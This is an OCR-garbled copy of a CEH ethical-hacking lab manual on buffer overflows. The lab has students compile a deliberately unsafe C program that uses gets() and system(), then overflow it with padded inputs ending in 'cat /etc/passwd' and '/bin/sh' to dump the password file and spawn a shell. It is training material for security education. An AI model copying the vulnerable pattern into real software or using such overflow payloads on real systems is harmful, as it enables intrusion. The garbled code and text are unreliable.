CEH v8 Labs Module 18 Buffer Overflow

CEH Lab M anual

B u f f e r O v e r f lo w

M o d u le 1 8

Module 18 - Buffer Overflow

Buffer Overflow AttackIn a buffer overflow, while writing data to a biffer, the b/ffer’s boundary is overrun and adjacent memory is overwritten.

Lab ScenarioSource: h ttp ://www.1c.u11icamp.br/~stolfi/urna/butfer-oflow

Hackers continuously look for vulnerabilities 111 software or a computer to break into the system by exploiting these vulnerabilities.

The most common vulnerability often exploited is die buffer overflow attack, where a program failure occurs eidier 111 allocating sufficient memory for an input string or 111 testing die lengdi of string if it lies within its valid range. A hacker can exploit such a weakness by submitting an extra-long input to the program, designed to overflow its allocated input buffer (temporary storage area) and modify the values of nearby variables, cause the program to jump to unintended places, or even replace the program's instructions by arbitrary code.

If the buffer overflow bugs lie 111 a network service daemon, the attack can be done by direcdy feeding the poisonous input string to the daemon. If the bug lies 111 an ordinary system tool or application, with no direct access, the hacker attaches the poisonous string widi a document or an email which, once opened, will launch a passive buffer overflow attack. Such attacks are equivalent to a hacker logging into the system widi die same user ID and privileges as die compromised program.

Buffer overflow bugs are especially common 111 C programs, since that language does not provides built-in array bound checking, and uses a final null byte to mark the end of a string, instead of keeping its length 111 a separate field. To make dungs worse, C provides many library functions, such as s t r c a t and g e t l in e , which copy strings without any bounds-checking.

As an expert ethical hacker and penetration tester, you must have sound knowledge of when and how buffer overflow occurs. You must understand stacks- based and heap-based buffer overflows, perform penetration tests for detecting buffer overflows in programs, and take precautions to prevent programs trom buffer overflow attacks.

Lab ObjectivesThe objective of tins lab is to help students to learn and perform buffer overflow attacks to execute passwords.

111 tins lab, you need to:

■ Prepare a script to overflow buffer

■ Run the script against an application

I CON KEY

Valuablein toiniadoa______

Test your knowledge

s A W eb exercise

m W orkbook review

E th ical H ack ing and C ounterm easures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.

C E H Lab M anual Page 902

http://www.1c.u11icamp.br/~stolfi/urna/butfer-oflow


■ Perform penetration testing for the application

■ Enumerate a password list

Lab Environment■ A computer running with Windows Server 2012 as Host machine

■ A Virtual Machine running with Back Track 5 R3

■ A web browser with Internet access

■ Administrative privileges to 11111 tools

Lab DurationTime: 20 A luiutes

Overview of Buffer OverflowBuffer overflow is an anomaly where a program, while wnting data to a buffer, overruns the butter's boundary and overwrites adjacent memory. Tins is a special case of violation of memory safety. Butter overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. Tins may result 111 erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited.

Lab TasksRecommended labs to assist you 111 buffer overflow:

■ Enumerating Passwords 111 “Default Password List”

o W rite a Code

o Compile die Code

o Execute the Code

o Perform Buffer Overflow Attack

o Obtain Command Shell

Lab AnalysisAnalyze and document the results related to the lab exercise. Give your opinion on your target’s security posture and exposure.

& This lab can be demonstrated using Backtrack Virtual Machine

2* TASK 1

Overview

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B .

E th ical H ack ing and C ounterm easures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



Buffer Overflow ExampleIn a b/rffer oveijlow, while writing data to a b/rffer, the buffer's boundary is overrun and adjacent memory is overwritten.

Lab Scenario111 computer security and programming, a buffer overflow, 01־ buffer overrun, vulnerability appears where an application needs to read external information such as a character string, the receiving butter is relatively small compared to the possible size of die input string, and the application doesn't check the size. The buffer allocated at run-time is placed 011 a stack, which keeps the information for executing functions, such as local variables, argument variables, and the return address. The overflowing string can alter such information. Tins also means that an attacker can change the information as he 01־ she wants to. For example, the attacker can inject a series o f macliine language commands as a string that also leads to the execution of the attack code bv changing the return address to the address of the attack code. The ultimate goal is usually to get control of a privileged shell by such methods.

Programming languages commonly associated with buffer overflows include C and C++, which provide 110 built-in protection against accessing 01־ overwriting data 111

any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries ot that array. Bounds checking can prevent buffer overflows.

As a penetration tester, you should be able to implement protection against stack- smaslung attacks. You must be aware of all the defensive measures for buffer overflow attacks. You can prevent buffer overflow attacks by implementing 11111- time checks, address obfuscation, randomizing location of functions 111 libc, analyzing static source code, marking stack as non-execute, using type safe languages such as Java, ML, etc.

Lab ObjectivesThe objective of tins lab is to help students to learn and perform buffer overflow to execute passwords.

111 tins lab, you need to:

I C O N K E Y

/ Valuableinformation

y* Test yourknowledge

s W eb exercise

m W orkbook review

Ethical H ack ing and Counterm easures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



■ Prepare a script to overflow buffer

■ Run the script against an application

■ Perform penetration testing for the application

■ Enumerate a password list

Lab Environment■ A computer running with Windows Server 2012 as Host maclune

■ A Virtual Machine running with Back Track 5 R3

■ A web browser with Internet a c c e ss

■ Administrative privileges to run tools

Lab DurationTime: 20 Minutes

Overview of Buffer OverflowBuffer overflow takes place when data written to a buffer because of insufficient bounds checking corrupts the data values 111 memory addresses, which are adjacent to the allocated buffer. Most often diis occurs when copying strings of characters from one buffer to another.

When die following program is compiled and mil, it will assign a block ot memory11 bytes long to hold die attacker string, strcpv function will copy the string “D D D D D D D D D D D D D D ” into an attacker string, which will exceed the buffer size of 11 bytes, resulting 111 buffer overflow.

0 1 2 3 4 5 6 7 8 9 10 1112 D D D D D D D D D D D D \ o String

3 4 5 6 7 8 9 10A A A A A A A A A A \0■c

i1 2 3 4 S7 6״

Buffer Overflow Example Code#include<stdio.h>

int main ( int argc, char * *argv)

{char B ufferfll] =״AAAAAAAAAA״;

strcpylBuffer/DDDDDDDDDODD״};

printf(“96 \n ;(Buffer .״

return 0;

}

This type o f vulnerability is prevalent in UNIX• and NT-based systems

Lab Tasks1. Launch your Back Track 5 R3 Virtual Machine.

2. For bdogin, type root and press Enter. Type the password as toor, and press Enter to log 111 to BackTrack virtual maclune.

I T This lab can be demonstrated using Backtrack Virtual Machine

S TASK 1

Write a Code

Ethical H ack ing and C ountenneasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



R־ TBackTrack on WIN 2N9STOSGIEN Virtual Machine Connection * ״kVia Clipboard View י

פ h ►וו 1 3@i . 0933761 HET: Registered protocol fa n ily 171.0915311 input: AT Translated Set 2 keyboard as /dc1;iccs^platfor1v'i8l>12/'scrio0/input/'inputl1.0952761 Registering the dns resolver key type1.0957B31 registered taskstats version 11.1639921 llagic nunber: 12:1ZU:12G1.1644561 acpi device:01: hash notches1.1056581 rtc.cnos 00:02: setting syste* clock to 2012-09-25 11:06:59 UTC (1340571219)1.165468) BIOS EDO fa c il i ty v0.16 2004-Jun-25, 0 devices found1.1658621 COD information not ava llable.1.2378181 a ta t.06: ATA-8: U irtual HD, 1.1.0, raax MUDMfi2 1.2389361 atat.06: 33554432 scctors, n u lt i 12B: LBA481.2415511 ataZ.06: filAPI: U irtual CD, , wax hllDt1A21.2432671 ata2.06: configured fo r MUM1n21.2441101 atal.06: configured fo r flUDHflZ1.2442231 scsi 0:0:0:6: Direct-Access ATA V irtua l HO 1.1. PQ: 6 AMSI: 51.2451571 sd 0:0:0:0: (sdal 33554432 512-byte logical blocks: (17.1 GB/׳lb.O GiB)1.2455461 sd 0:0:0:0: lsd<1l 4096-hyte physical blocks1.2459741 sd 0:0:0:0: (sdal Write Protect Is o ff1.2463841 sd 0:0:0:0: Attached scsi generic sgO type 01.2468141 sd 0:0:0:0: fsdal Urlte cache: enabled, read cache: enabled, doesn't support DPT nr Flh1.2404231 scsi 1:0:0 0: CD ROM Hsft U irtual CD/ROM 1.0 PQ: 6 AHSI 51.2515061 sr6: scsi3 mik drive: 0x/0k tray1.2526091 cdron: Uniforn CD HUM driver Revision: 3.261.2527931 * r 1:0:0:0: Attached scsi generic sgl type 51.2506571 sda: sdal r.da2 < xda5 >1.2506591 ad 0:0:0:0: Inda I Attached 8C5I disk1.2602631 Freeing iiiiiisimI kernel **:wiry; 96Hk fn xd 1.2608041 U rlte pro tectI1M| the kernel read only data: 1228Hk1.26S624I Freeing unused kernel MMinj: 1732k freed 1.2699051 Prering unused kernel !*rnorij: 1492k freed

ling, please w a it...1.2873151 udev: starting version 1511.2962U0I udevd (03): /•prot/׳U3/uon adj is deprecated. please use /proc/OJ/oon score adj instead.1.3963921 Floppy drive(s): fdO is 1.44f1 1.41 rilH I PDC 6 is an 02070.2.0203071 Refined T8C clocksource calib ra tion : 3692.970 fW׳־..

FIGURE 1.1: BackTrack Login

3. Type startx to launch die GUI.1-1°BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection־ ־*

■ Re irrior I.V44 CSpbeard VieI't •> (- © 3 11 1► h

_ Buffer overflow occurswhen a program or process tries to store more data in a buffer.

1.24S974I sd 0:0:6:6: (sdal Urlte Protect Is o ff1.2463841 sd 0:0:6:6: Attached scsI generic sy6 type 61.2468141 sd 0:0:0:©: tsdal Urlte cache: enabled, read cache: enabled, doesn't support DP0 or FU11.2404231 scsi 1:6:6:0: CD ROM Msft U irtual CD-ROM 1 6 PQ: 6 ANSI: 51.2515061 sr6: scsi3־rwc drive: 0x/0־x tray 1.252*091 cdrm : Onifcrn CD-HW driver Revision: 3.20I .2527931 sr !:0 :6 :6: Attached scsi generic syl type 5 I .2586571 sda: sdal sda2 < sd»5 >1.2506591 sd 0:0:6 6: (sdal attached SCSI disk1.2602631 freeing unused kernel ncmury: 'J6UK freed 1.2I10H04I Write protecting the kernel read-only data: IZZIMIk1.2656241 FreeIny unused kernel nennry: 1732k freed 1.2699851 Freeing unused kernel nonary: 1492k freed

ading, please u a lt . . .1.2873151 udev: starting version 1511.2962001 udevd (83): /p r01v l l l01׳m_(1d j is deprecated, please use /׳proc/03׳׳cw»»_score_adj instead.1.3963921 Floppy drive(s): fd6 is 1.44H 1.4139841 FK 6 Is an H267H.2.0203871 Refined TSC clocksource calib ra tion : 3692.970 life

cklrack 5 JO - 64 B it bt t t y l

g iu tined out a fte r 60 seconds.

Systen information as of Iuc Sep 25 16:45:47 1ST 2012

Systea load: 0.08 Processes: 72Usage o f ✓: 72.3x o f 15.23GB Users logged In: 0rtenory usage: 1׳ IP address fo r eth6: 10.0.0.14Swap usage: Ok

Graph th is data and w1na!!r th is systen at https:/✓landscape.canonical.con✓

FIGURE 1.2: BackTrack GUI Login-Startx Command

4. BackTrack 5 R3 GUI desktop opens, as shown 111 die following screenshot.

m Code which is entered in kedit is case-sensitive.

Ethical H ack ing and Counterm easures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.



FIGURE 1.3: BackTrack 5 R3 Desktop

5. Select the BackTrack Applications menu, and then select A ccessories gedit Text Editor.

Mem (»_J/ל

* ^ Oik uwg* Analyzer

^ oedlt Tfcxt Editor

| TWmlrwl

ס Tkrminator

y־ t. > r*

*V *«es*o׳H׳s

^ BackTtock

4 &#***%

£ internet

dioflke)14 Other

WK Sound 6 V̂ deo

0 System Tools

<< back trackca Programming languages commonly associated with buffer overflows include C and C++.

FIGURE 1.4: Launching gedit Text Editor

6. Enter die following code 111 gedit Text Editor (Note: the code is case- sensitive).

# in c lu d e < s td io . h> v o id m ain ()

{char *name;char *command;name=(char * )m a llo c (10);command=(char *)m a llo c (128);p r in t f ( " a d d r e s s o f name i s : %d\n",name);p r in t f ( " a d d r e s s o f command i s : %d\n",command);p r in t f ( " D if f e re n c e between ad d ress i s : %d\n", command-




name);p r i n t f ("E n te r your nam e:"); g e ts (n am e);p r i n t f ("H ello % s\n",nam e); system(command);

}g ־ v x *unsaved Document 1 <׳׳ e d it

File Edit View Search Tools Documents Help

^ ^ ^ J o p e n ▼ ^ _ S a v e Undo ^ 9kn *Unsaved Document 1 X#1nclude<std10 .h> vo id main(){char •name;char •command;name=(char * )m a lloc (10 );command=(char *)m a llo c (1 2 8 );p r in tf("a d d re s s o f name is : %d\n",name);p r in tf("a d d re s s o f command is:%d\n",command);p r in t f ( “D iffe rence between address is :%d\n“ ,command-name);p r in t f ( "E n te r your name:“ ) ;gets(name);p r in t f ( " H e llo %s\n",name); system(command);

Plain Text ▼ Tab Width: 8 ▼ Ln 15, Col 2

FIGURE 1.5: Writing code for execution

7. Now save die program by selecting File ־־) Save As־) root or simply click Save as shown 111 the following screenshot screenshot as buffer.c.

___* *U nsaved D o cu m en t 1 ־ g e d it

File Edit View Search Tools Documents Help

Now launch die command terminal and compile die code by running:

gcc b u f f e r . c -o b u f f e r

Ii=y1 Code is compiled using the following commend: gee buffer.c biiffer.

ט No tool can solve completely die problem of buffer overflow, but die)׳■ surely can decrease the probability of stack smashing attacks.

Compile the Code




/v v x ro ot@ bt: -

File Edit View Terminal Helproot@bt: #־־ |gcc b u ffe r.c -0 b u ffe rf j

FIGURE 1.7: BackTrack compiling the code

9. If there are any errors, ignore them./v v X rootcabt: -File Edit View Terminal Helpro o tg b t:-# gcc b u ffe r .c ■0 b u ffe rb u ffe r .c : In func tion 'm a in ': —b u ffe r .c :6 : warning: incom patible im p l ic i t d e c la ra tion o f b u itfs tlH ^ u n c tio n ‘ mal loc 1̂ •—— ׳ —b u ffe r .c :8 : warning: format '%d' expects type1" n־ t ' , but a rgum ent^'ttss type 'ch a r • ׳b u ffe r .c :9 : warning: format '%d' expects type , i n j ^ o u t argument 2 jM F ty p e *ch a r » ' gb u ffe r.c :1 0 : warning: format '%d' expects type ' i n t ׳ , but argum ent# has type ' I ong i n t '/tm p/ccx6Y3vl.o: In func tion m ain ':b u ffe r .c : ( .tex t+6x90 ): warning: the ge ts ' func tion is dangerous a n ^ t a u ^ ^ io t be used. root@bt:~# [ ]

: b a c k I t r a c k

FIGURE 1.8: BackTrack Error Message Window

10. To execute the program type . /buffer

The program executes using following command: .!buffer

— j

Execute the Code

Ethical H ack ing and C ounterm easures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



ro * ־־ o t@ b t: ~

File Edit View Terminal Helpro o tg b t: •־# | . /b u f fe r | address o f name is : 20144144 address o f command i s :20144176 D iffe rence between address is :32 1Enter your name:|

■

. b a c k t r a c k ^ ) 1

ם

m An executable program on a disk contains a set of binary instructions to be executed by die processor.

FIGURE 1.9: BackTrack Executing Program

11. Type any name in die Input held and press Enter; here, using Jason as an example.

v x r o o t@ b t: - »

File Edit View Terminal Helproot@bt:~# . /b u f fe r

20144144 : address o f name is 26144176:address o f command i s

32: D iffe rence between address is | as:|נEnter your name

b a c k I t r a c kc a Buffer overflows work by manipulating pointers (including stored addresses).

FIGURE 1.10: Input Field

12. Hello Jason should be printed.




v x ro o t@ b t: - /\

File Edit View Terminal Helproo t@ bt:~# . / b u f fe r

26144144 : address o f name i s 20144176:address o f command i s

32: D if fe re n c e between address is E n te r y o u r name: Jason

o o t® b t:~ # fl״

b a c k I t r a c k

FIGURE 1.11: Hello Jason

13. Now, overflow the buffer and execute the listed system commands.

14. Run die program again by typing ./buffer.

15. Tvpe 12345678912345678912345678912345cat /e tc /p a ssw d 111 die Input held.

16. You can view a printout of die password hie.a v א root(g>bt: -

File Edit View Terminal Helproo t@ bt:~# . / b u f fe r address o f name is : 17747984 address o f command i s :17748016 D if fe re n c e between address i s :32E n te r yo ur name:|12345678912345678912345678912345cat /e tc /p assw d |H e llo 12345678912345678912345678912345cat /e tc /p assw dro o t : x : e : 0 : r o o t : / r o o t : /b in /b a s hdaemon: x : 1 : 1 : daemon: /u s r / s b in : /b in /s hb in : x : 2 : 2 : b in : / b i n : /b in /s hs y s : x : 3 : 3 : s y s : /d e v : /b in /s hsync:x :4 :65534:sync: /b in : /b in /syn cgames: x : 5 : 60 : games: /u s r/gam es: /b in /s hman:x :6 : 12 :man: /va r/cache/man: /b in /s hI p : x : 7 :7 : I p : / v a r /s p o o l / lp d : /b in /s hm a i l : x^S : 8 : m a i l : /v a r /m a iU /b in /s h _news: x t : 9 : news: /v a r /s p o j j /n e w s : / t j^ n /s h g

lu iic p : x :1 e : l e : if t ic jfc /v a r /s p d o l/u u c p ijrb in T M f p roxy :x : 1 3 :1 3 :p ro x y :/b 1 n :/b 1 n /s h I ■ I t

L w w d a ta :x :3 3 :3 3 :w w w -d a ta : /v a r /w w \* /b in f t ( l I Ibackup: x : 3 4 :3 4 :backup: /v a r /b a c k u p f /b in / s h U s t :x :3 8 :3 8 :M a i l in g L is t H a n a g e r : / v a r / l is t : / b in / s hi r e : x :3 9 :3 9 : i re d : /v a r / r u n / i re d : /b in /s hg n a ts :x :4 1 :4 l:G n a ts B ug -R eporting System (a d m in ) : / v a r / l ib /g n a ts : / b in /s h

( l ib u u id : x :1 0 0 :1 6 1 :: / v a r / l i b / l i b u u ld : /b in /s h

FIGURE 1.12: Executing Password

17. Now, obtain a Command Shell.

18. Run die program again ./buffer and tvpe12345678912345678912345678912345/ b i n / s h 111 the Input held.

B T A S K 4

Perform Buffer Overflow Attack

Buffer overflow vulnerbililties typically occur in code that a programmer cannot accrately predict buffer overflow behvior.

■ m . T A S K 5

Obtain Command Shell




/v v x ro o t@ b t: -

File Edit View Terminal Helproo t@ bt:~# . /b u f fe r address o f name is : 24616976 address o f command i s :24617008 D iffe rence between address is :32Enter your nameJ12345678912345678912345678912345/bm/sh|H e llo 12345678912345678912345678912345/bin/shsh-4.1#sh-4.1#sh-4.1# [ ]

b a c k t r a c k

FIGURE 1.13: Executing 12345678912345678912345678912345/hin/sh

19. Type Exit 111 Shell !Console 01־ close the program.

Lab AnalysisAnalyze and document die results related to die lab exercise. Giye your opinion 011

your target’s security posture and exposure.

m Code scrutiny (writing secure code) is the best possible solution to bufferflow attacks.

T o o l/U tility Inform ation C ollected /O bjec tives Achieved

Buffer Overflow

■ Address o f name is: 24616976■ Address o f command 1s: 24617008

■ Difference between address is: 32■ Enter your name:

12345678912345678912345678912345/b in / sh■ Hello

12345678912345678912345678912345/bin/sh sh-4.1# יsh-4.1# יsh-4.1# י

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B .



Questions1. Evaluate various methods to prevent buffer overflow.

2. Analyze how to detect run-time buffer overflow.

3. Evaluate and list the common causes o f buffer-overflow errors under .NET language.

In ternet C onnection R equired

D Yes 0 N o

Platform Supported

0 C lassroom 0 !Labs

